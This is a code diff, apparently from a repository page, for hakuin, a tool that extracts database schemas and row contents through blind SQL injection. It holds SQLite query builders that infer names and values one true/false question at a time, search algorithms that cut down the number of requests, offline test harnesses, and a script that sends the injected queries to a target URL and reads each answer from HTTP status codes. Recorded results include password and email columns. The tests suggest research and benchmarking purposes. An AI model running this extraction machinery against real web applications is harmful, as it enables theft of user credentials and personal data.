def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def rows_are_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT length(name) != {len(ctx.s)} AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx):
|
||||
raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class SQLiteRowsQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def rows_are_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND
|
||||
instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx, values):
|
||||
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
|
||||
FROM {SQLite.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
class SQLite(DBMS):
|
||||
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
|
||||
|
||||
MetaQueries = SQLiteMetaQueries()
|
||||
TablesQueries = SQLiteTablesQueries()
|
||||
ColumnsQueries = SQLiteColumnsQueries()
|
||||
RowsQueries = SQLiteRowsQueries()
|
||||
|
@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
|
||||
|
||||
|
||||
|
||||
class IntExponentialSearch(SearchAlgorithm):
|
||||
'''Exponential search for integers.'''
|
||||
def __init__(self, requester, query_cb, upper=16, correct=None):
|
||||
class IntExponentialBinarySearch(SearchAlgorithm):
|
||||
'''Exponential and binary search for integers.'''
|
||||
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
upper (int): initial upper bound of search range
|
||||
lower (int): lower bound of search range
|
||||
upper (int): upper bound of search range
|
||||
find_range (bool): exponentially expands range until the correct value is within
|
||||
correct (int|None): correct value. If provided, the search is emulated
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
self.lower = lower
|
||||
self.upper = upper
|
||||
self.find_range = find_range
|
||||
self.correct = correct
|
||||
self.n_queries = 0
|
||||
|
||||
@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
int: inferred number
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
lower, upper = self._get_range(ctx, lower=0, upper=self.upper)
|
||||
if self.find_range:
|
||||
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
|
||||
else:
|
||||
lower, upper = self.lower, self.upper
|
||||
|
||||
return self._search(ctx, lower, upper)
|
||||
|
||||
|
||||
def _get_range(self, ctx, lower, upper):
|
||||
def _find_range(self, ctx, lower, upper):
|
||||
'''Exponentially expands the search range until the correct value is within.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
lower (int): lower bound
|
||||
upper (int): upper bound
|
||||
|
||||
@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
if self._query(ctx, upper):
|
||||
return lower, upper
|
||||
|
||||
return self._get_range(ctx, upper, upper * 2)
|
||||
return self._find_range(ctx, upper, upper * 2)
|
||||
|
||||
|
||||
def _search(self, ctx, lower, upper):
|
||||
'''Numeric binary search.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
lower (int): lower bound
|
||||
upper (int): upper bound
|
||||
|
||||
@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
middle = (lower + upper) // 2
|
||||
if self._query(ctx, middle):
|
||||
return self._search(ctx, lower, middle)
|
||||
else:
|
||||
return self._search(ctx, middle, upper)
|
||||
|
||||
return self._search(ctx, middle, upper)
|
||||
|
||||
|
||||
def _query(self, ctx, n):
|
||||
@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, n)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct < n
|
||||
|
||||
return self.correct < n
|
||||
|
||||
|
||||
|
||||
@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value|None: inferred value or None on fail
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
return self._search(ctx, self.values)
|
||||
|
||||
|
||||
@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
|
||||
|
||||
if self._query(ctx, left):
|
||||
return self._search(ctx, left)
|
||||
else:
|
||||
return self._search(ctx, right)
|
||||
|
||||
return self._search(ctx, right)
|
||||
|
||||
|
||||
def _query(self, ctx, values):
|
||||
@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, values)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct in values
|
||||
|
||||
return self.correct in values
|
||||
|
||||
|
||||
|
||||
@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
|
||||
'''Runs the search algorithm.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value|None: inferred value or None on fail
|
||||
'''
|
||||
self.n_queries = 0
|
||||
|
||||
return self._search(ctx, self.tree, in_tree=self.in_tree)
|
||||
|
||||
|
||||
@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
|
||||
'''Tree search.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
tree (utils.huffman.Node): Huffman tree to search
|
||||
in_tree (bool): True if the correct value is known to be in the tree
|
||||
|
||||
@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
|
||||
|
||||
if self._query(ctx, tree.left.values()):
|
||||
return self._search(ctx, tree.left, True)
|
||||
else:
|
||||
if tree.right is None:
|
||||
return None
|
||||
return self._search(ctx, tree.right, in_tree)
|
||||
|
||||
if tree.right is None:
|
||||
return None
|
||||
|
||||
return self._search(ctx, tree.right, in_tree)
|
||||
|
||||
|
||||
def _query(self, ctx, values):
|
||||
@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
|
||||
if self.correct is None:
|
||||
query_string = self.query_cb(ctx, values)
|
||||
return self.requester.request(ctx, query_string)
|
||||
else:
|
||||
return self.correct in values
|
||||
|
||||
return self.correct in values
|
||||
|
@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
|
||||
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
|
||||
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
|
||||
|
||||
ASCII_MAX = 0x7f
|
||||
UNICODE_MAX = 0x10ffff
|
||||
|
||||
CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
|
||||
CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
|
||||
|
||||
EOS = '</s>'
|
||||
SOS = '<s>'
|
||||
|
@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
|
||||
|
||||
class OfflineRequester(Requester):
|
||||
'''Offline requester for testing purposes.'''
|
||||
def __init__(self, db):
|
||||
def __init__(self, db, verbose=False):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
db (str): name of an .sqlite DB in the "dbs" dir
|
||||
verbose (bool): flag for verbous prints
|
||||
'''
|
||||
db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
|
||||
assert os.path.exists(db_file), f'DB not found: {db_file}'
|
||||
self.db = sqlite3.connect(db_file).cursor()
|
||||
self.verbose = verbose
|
||||
self.n_queries = 0
|
||||
|
||||
|
||||
def request(self, ctx, query):
|
||||
self.n_queries += 1
|
||||
query = f'SELECT cast(({query}) as bool)'
|
||||
return bool(self.db.execute(query).fetchone()[0])
|
||||
|
||||
res = bool(self.db.execute(query).fetchone()[0])
|
||||
|
||||
if self.verbose:
|
||||
print(f'"{ctx.s}"\t{res}\t{query}')
|
||||
|
||||
return res
|
||||
|
||||
|
||||
|
||||
def reset(self):
|
||||
|
7
tests/dbs/unicode.json
Normal file
7
tests/dbs/unicode.json
Normal file
@ -0,0 +1,7 @@
|
||||
{
|
||||
"Ħ€ȽȽ© ŴǑȒȽƉ": [
|
||||
{
|
||||
"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
|
||||
}
|
||||
]
|
||||
}
|
BIN
tests/dbs/unicode.sqlite
Normal file
BIN
tests/dbs/unicode.sqlite
Normal file
Binary file not shown.
@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
|
||||
def main():
|
||||
assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [table> <column>]'
|
||||
|
||||
requester = OfflineRequester(db='large_content')
|
||||
requester = OfflineRequester(db='large_content', verbose=False)
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
if len(sys.argv) == 3:
|
||||
@ -60,58 +60,58 @@ if __name__ == '__main__':
|
||||
# {
|
||||
# "users": {
|
||||
# "username": [
|
||||
# 42124,
|
||||
# 5.738182808881624
|
||||
# 42125,
|
||||
# 5.738319030104891
|
||||
# ],
|
||||
# "first_name": [
|
||||
# 27901,
|
||||
# 4.882919145957298
|
||||
# 27902,
|
||||
# 4.883094154707735
|
||||
# ],
|
||||
# "last_name": [
|
||||
# 32701,
|
||||
# 5.344173884621671
|
||||
# 32702,
|
||||
# 5.344337310017977
|
||||
# ],
|
||||
# "sex": [
|
||||
# 1608,
|
||||
# 0.3216
|
||||
# 1609,
|
||||
# 0.3218
|
||||
# ],
|
||||
# "email": [
|
||||
# 78138,
|
||||
# 3.7532062058696383
|
||||
# 78139,
|
||||
# 3.7532542389163743
|
||||
# ],
|
||||
# "password": [
|
||||
# 137115,
|
||||
# 4.28484375
|
||||
# 137116,
|
||||
# 4.284875
|
||||
# ],
|
||||
# "address": [
|
||||
# 86872,
|
||||
# 2.1946795341434453
|
||||
# 86873,
|
||||
# 2.1947047975140843
|
||||
# ]
|
||||
# },
|
||||
# "posts": {
|
||||
# "text": [
|
||||
# 409302,
|
||||
# 4.312482220185226
|
||||
# 409303,
|
||||
# 4.312492756371759
|
||||
# ]
|
||||
# },
|
||||
# "comments": {
|
||||
# "text": [
|
||||
# 346373,
|
||||
# 3.920464063384267
|
||||
# 346374,
|
||||
# 3.9204753820033957
|
||||
# ]
|
||||
# },
|
||||
# "products": {
|
||||
# "name": [
|
||||
# 491174,
|
||||
# 3.8737341871983344
|
||||
# 491175,
|
||||
# 3.873742073882457
|
||||
# ],
|
||||
# "category": [
|
||||
# 6721,
|
||||
# 0.42975893599334997
|
||||
# 6753,
|
||||
# 0.4318051026280453
|
||||
# ],
|
||||
# "description": [
|
||||
# 966309,
|
||||
# 3.2259549579023976
|
||||
# 966310,
|
||||
# 3.2259582963324007
|
||||
# ]
|
||||
# }
|
||||
# }
|
||||
|
@ -27,3 +27,8 @@ def main():
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
|
||||
|
||||
# Expected results:
|
||||
# Total requests: 27376
|
||||
# Average RPC: 2.2098805295447206
|
@ -25,13 +25,17 @@ class R(Requester):
|
||||
|
||||
r = requests.get(url)
|
||||
assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}'
|
||||
|
||||
# print(ctx.s, r.status_code == 200, query)
|
||||
return r.status_code == 200
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>'
|
||||
_, dbms_type, table, column = sys.argv
|
||||
assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
|
||||
argv = sys.argv + [None, None]
|
||||
_, dbms_type, table, column = argv[:4]
|
||||
|
||||
allowed = ['sqlite', 'mysql']
|
||||
assert dbms_type in allowed, f'dbms must be in {allowed}'
|
||||
|
||||
@ -39,10 +43,12 @@ def main():
|
||||
dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
|
||||
ext = Extractor(requester, dbms)
|
||||
|
||||
res = ext.extract_schema(metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
res = ext.extract_column(table, column)
|
||||
print(json.dumps(res, indent=4))
|
||||
if table is None:
|
||||
res = ext.extract_schema(strategy='model', metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
else:
|
||||
res = ext.extract_column(table, column)
|
||||
print(json.dumps(res, indent=4))
|
||||
|
||||
|
||||
|
||||
|
29
tests/test_small_schema.py
Normal file
29
tests/test_small_schema.py
Normal file
@ -0,0 +1,29 @@
|
||||
import json
|
||||
import logging
|
||||
|
||||
from hakuin.dbms import SQLite
|
||||
from hakuin import Extractor
|
||||
|
||||
from OfflineRequester import OfflineRequester
|
||||
|
||||
|
||||
|
||||
logging.basicConfig(level=logging.INFO)
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
requester = OfflineRequester(db='large_content')
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
res = ext.extract_schema(metadata=True)
|
||||
print(json.dumps(res, indent=4))
|
||||
|
||||
res_len = sum([len(table) for table in res])
|
||||
res_len += sum([len(column) for table, columns in res.items() for column in columns])
|
||||
print('Total requests:', requester.n_queries)
|
||||
print('Average RPC:', requester.n_queries / res_len)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
28
tests/test_unicode.py
Normal file
28
tests/test_unicode.py
Normal file
@ -0,0 +1,28 @@
|
||||
import json
|
||||
import logging
|
||||
|
||||
import hakuin
|
||||
from hakuin import Extractor
|
||||
from hakuin.dbms import SQLite
|
||||
|
||||
from OfflineRequester import OfflineRequester
|
||||
|
||||
|
||||
|
||||
logging.basicConfig(level=logging.INFO)
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
requester = OfflineRequester(db='unicode', verbose=False)
|
||||
ext = Extractor(requester=requester, dbms=SQLite())
|
||||
|
||||
res = ext.extract_schema(strategy='binary')
|
||||
print(res)
|
||||
|
||||
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
Loading…
Reference in New Issue
Block a user